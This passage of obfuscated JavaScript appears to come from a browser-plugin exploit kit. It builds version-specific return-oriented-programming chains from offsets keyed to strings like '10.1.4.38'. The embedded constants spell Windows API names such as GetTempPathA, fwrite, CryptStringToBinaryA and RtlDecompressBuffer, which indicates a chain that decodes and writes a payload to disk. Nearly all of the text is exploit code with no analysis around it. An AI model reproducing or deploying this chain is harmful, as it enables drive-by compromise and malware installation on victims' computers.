r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1e51\);r+=ue\(0x41414141\);r+=ue\(t+0x81800e\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc05ec\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1e51\);r+=ue\(t+0x60a4fc\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1e51\);r+=ue\(0x41414141\);r+=ue\(t+0x818001\);r+=ue\(t+0x14de\);r+=ue\(t+0x17\);\n        r+=ue\(0x1010101\);r+=ue\(t+0x818101\);r+=ue\(t+0x5f00d9\);r+=ue\(t+0x818101\);r+=ue\(t+0x4f1b93\);r+=ue\(t+0x5f00d9\);r+=ue\(0x542e44\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x502518\);r+=ue\(t+0x52874e\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc05f8\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x5f00d9\);r+=ue\(t+0x818052\);r+=ue\(t+0x46efc0\);\n        r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);\n        r+=ue\(0xcccc05fc\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f165c\);r+=ue\(t+0x1deda\);r+=ue\(t+0x5ec746\);r+=ue\(t+0x818101\);r+=ue\(t+0x818015\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0600\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0614\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x5f00d9\);r+=ue\(t+0x81805e\);r+=ue\(t+0x46efc0\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc05f4\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(0x42424242\);r+=ue\(t+0x501755\);r+=ue\(0x43434343\);r+=ue\(0x44444444\);r+=ue\(0x44444444\);\n        r+=ue\(0x45454545\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1668\);\n        r+=ue\(t+0x1deda\);r+=ue\(t+0x558d40\);r+=ue\(0x45454545\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1e51\);r+=ue\(t+0x818101\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f10c0\);r+=ue\(t+0x4b1e51\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(0x6f004d\);r+=ue\(0x750064\);r+=ue\(0x65006c\); ROP_ADD_ESP_4 = 0x20c70c8b;\n        bENEDETTO = 0x20d7cb1d;\n        cARPONE = 0x20d02755;\n        sENTIRSI = 0x20cfaae0;\n        rICINGHE = 0x20cec87c;\n        aPPARENZA = 0x2080dec7;\n        fISAMENTE = 0x20d796fa;\n        pRESUNSI = 0x20801017;\n        oRDERED = 0x20ceae6f;\n        cOCOLLE = 0x208914f9;\n    } else if\(pRENDENDO == '10.1.4.38'\){\n        var r="";\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x41ea3e\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b001\);\n        r+=ue\(t+0x5f3029\);r+=ue\(0x54746547\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b005\);r+=ue\(t+0x5f3029\);r+=ue\(0x50706d65\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b009\);r+=ue\(t+0x5f3029\);r+=ue\(0x41687461\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b00d\);r+=ue\(t+0x5f3029\);r+=ue\(0x41414100\);\n        r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b00e\);r+=ue\(t+0x5f3029\);r+=ue\(0x69727766\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);\n        r+=ue\(t+0x81b012\);r+=ue\(t+0x5f3029\);r+=ue\(0x41006574\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);\n        r+=ue\(t+0x81b015\);\n        r+=ue\(t+0x5f3029\);r+=ue\(0x41006277\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b018\);r+=ue\(t+0x5f3029\);r+=ue\(0x70797243\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b01c\);r+=ue\(t+0x5f3029\);r+=ue\(0x72745374\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b020\);r+=ue\(t+0x5f3029\);r+=ue\(0x54676e69\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b024\);r+=ue\(t+0x5f3029\);r+=ue\(0x6e69426f\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b028\);r+=ue\(t+0x5f3029\);r+=ue\(0x41797261\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b02c\);r+=ue\(t+0x5f3029\);r+=ue\(0x41414100\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b02d\);r+=ue\(t+0x5f3029\);r+=ue\(0x6c64746e\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b031\);r+=ue\(t+0x5f3029\);r+=ue\(0x4141006c\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b033\);r+=ue\(t+0x5f3029\);r+=ue\(0x446c7452\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b037\);r+=ue\(t+0x5f3029\);r+=ue\(0x6d6f6365\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b03b\);r+=ue\(t+0x5f3029\);r+=ue\(0x73657270\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b03f\);r+=ue\(t+0x5f3029\);r+=ue\(0x66754273\);r+=ue\(t+0x4702da\);\n        r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b043\);r+=ue\(t+0x5f3029\);r+=ue\(0x726566\);r+=ue\(t+0x4702da\);\n        r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b047\);\n        r+=ue\(t+0x5f3029\);r+=ue\(0x73736377\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b04b\);r+=ue\(t+0x5f3029\);r+=ue\(0x41007274\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0240\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x3c7954\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc023c\);\n        r+=ue\(t+0x42267a\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);\n        r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x81aa26\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc022c\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8dc1\);r+=ue\(0x41414141\);r+=ue\(t+0x81b047\);r+=ue\(t+0x1449\);r+=ue\(t+0x5ef695\);r+=ue\(0x41414141\);r+=ue\(t+0x60d990\);\n        r+=ue\(t+0x2e2038\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x4702da\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5b71f7\);\n        r+=ue\(t+0x81b04e\);r+=ue\(t+0x5f3029\);\n        r+=ue\(0x1010101\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x81abc0\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc02ac\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);\n        r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f41d4\);\n        r+=ue\(t+0x4d8dc1\);r+=ue\(0x41414141\);r+=ue\(t+0x81b018\);r+=ue\(t+0x4fd5ce\);r+=ue\(t+0x5f3029\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x4719a0\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc033c\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x504f35\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0340\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x504f35\);r+=ue\(t+0x55bc32\);\n        r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0344\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);\n        r+=ue\(t+0x4fd5ce\);r+=ue\(t+0x1449\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);\n        r+=ue\(0x42424242\);r+=ue\(0x43434343\);r+=ue\(t+0x81b066\);r+=ue\(t+0x81b04e\);r+=ue\(t+0x81b056\);r+=ue\(t+0x81b05a\);r+=ue\(t+0x504f35\);r+=ue\(t+0x55bc32\);r+=ue\(t+0x55bc32\);r+=ue\(t+0x51b3bd\);\n        r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0428\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);\n        r+=ue\(t+0x4702da\);r+=ue\(t+0x5f3029\);\n        r+=ue\(t+0x81b04e\);\n        r+=ue\(t+0x4719a0\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0438\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5f3029\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x4719a0\);\n        r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc042c\);r+=ue\(t+0x42267a\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x81b02d\);\n        r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0418\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8dc1\);r+=ue\(0x41414141\);r+=ue\(t+0x81b033\);r+=ue\(t+0x1449\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);r+=ue\(t+0x81b066\);r+=ue\(0x43434343\);\n        r+=ue\(t+0x81b052\);\n        r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x81aa26\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc047c\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x13c112\);\n        r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8dc1\);r+=ue\(0x41414141\);\n        r+=ue\(t+0x81b00e\);r+=ue\(t+0x51b3bd\);\n        r+=ue\(t+0x5ef725\);r+=ue\(0xcccc05ec\);\n        r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);\n        r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x60d4fc\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);\n        r+=ue\(t+0x4702da\);r+=ue\(t+0x5b71f7\);\n        r+=ue\(t+0x5f41d4\);\n        r+=ue\(t+0x4d8dc1\);r+=ue\(0x41414141\);\n        r+=ue\(t+0x81b001\);r+=ue\(t+0x1449\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(t+0x81b101\);r+=ue\(t+0x5f3029\);r+=ue\(t+0x81b101\);r+=ue\(t+0x4f45b3\);r+=ue\(t+0x5f3029\);r+=ue\(0x542e44\);r+=ue\(t+0x4702da\);r+=ue\(t+0x504f35\);r+=ue\(t+0x55bc32\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc05f8\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);\n        r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x5f3029\);r+=ue\(t+0x81b052\);r+=ue\(t+0x4719a0\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc05fc\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);\n        r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4660\);r+=ue\(t+0x1dfb0\);r+=ue\(t+0x5ef695\);r+=ue\(t+0x81b101\);r+=ue\(t+0x81b015\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0600\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc0614\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);\n        r+=ue\(t+0x5f3029\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x4719a0\);r+=ue\(t+0x51b3bd\);r+=ue\(t+0x5ef725\);r+=ue\(0xcccc05f4\);r+=ue\(t+0x42267a\);r+=ue\(t+0x17\);r+=ue\(t+0x13c112\);r+=ue\(t+0x2613ec\);r+=ue\(t+0x4702da\);r+=ue\(0x42424242\);r+=ue\(t+0x504172\);r+=ue\(0x43434343\);\n        r+=ue\(0x44444444\);r+=ue\(0x44444444\);r+=ue\(0x45454545\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f466c\);r+=ue\(t+0x1dfb0\);r+=ue\(t+0x5b71f7\);r+=ue\(0x45454545\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x81b101\);r+=ue\(t+0x5b71f7\);r+=ue\(t+0x5f40c0\);r+=ue\(t+0x4d8dc1\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(0x6f004d\);r+=ue\(0x750064\);r+=ue\(0x65006c\);\n        ROP_ADD_ESP_4 = 0x20c7368b;\n        bENEDETTO = 0x20d7f9fd;\n        cARPONE = 0x20d05172;\n        sENTIRSI = 0x20cfd4fe;\n        rICINGHE = 0x20cef29c;\n        aPPARENZA = 0x2080df48;\n        fISAMENTE = 0x20d034fa;\n        pRESUNSI = 0x20801017;\n        oRDERED = 0x20ced86f;\n        cOCOLLE = 0x20891c3e;\n    } else if\(pRENDENDO == '10.1.4.38ARA'\){\n        var r="";\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x41ebf0\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b001\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x54746547\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b005\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x50706d65\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b009\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41687461\);\n        r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b00d\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41414100\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b00e\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x69727766\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b012\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41006574\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b015\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41006277\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b018\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x70797243\);r+=ue\(t+0x4705ba\);\n        r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b01c\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x72745374\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b020\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x54676e69\);\n        r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);\n        r+=ue\(t+0x81b024\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x6e69426f\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b028\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41797261\);\n        r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b02c\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41414100\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b02d\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x6c64746e\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b031\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x4141006c\);r+=ue\(t+0x4705ba\);\n        r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b033\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x446c7452\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b037\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x6d6f6365\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b03b\);\n        r+=ue\(t+0x5f2fe9\);r+=ue\(0x73657270\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b03f\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x66754273\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b043\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x726566\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b047\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x73736377\);\n        r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b04b\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x41007274\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0240\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x13c4c3\);r+=ue\(t+0x3cf4c9\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc023c\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8d90\);r+=ue\(t+0x81aa0e\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);\n        r+=ue\(0xcccc022c\);r+=ue\(t+0x42259f\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8d90\);r+=ue\(0x41414141\);r+=ue\(t+0x81b047\);r+=ue\(t+0x1576\);r+=ue\(t+0x5ef654\);r+=ue\(0x41414141\);r+=ue\(t+0x60d990\);\n        r+=ue\(t+0x2e1d70\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x81b04e\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x1010101\);r+=ue\(t+0x4705ba\);\n        r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8d90\);r+=ue\(t+0x81aba8\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc02ac\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8d90\);r+=ue\(0x41414141\);r+=ue\(t+0x81b018\);r+=ue\(t+0x51b3ae\);r+=ue\(t+0x5f2fe9\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x468ec0\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc033c\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x504f35\);\n        r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0340\);\n        r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x504f35\);r+=ue\(t+0x505b0e\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0344\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x51b3ae\);r+=ue\(t+0x1576\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);\n        r+=ue\(0x42424242\);r+=ue\(0x43434343\);r+=ue\(t+0x81b066\);r+=ue\(t+0x81b04e\);r+=ue\(t+0x81b056\);r+=ue\(t+0x81b05a\);r+=ue\(t+0x504f35\);r+=ue\(t+0x505b0e\);r+=ue\(t+0x505b0e\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0428\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);\n        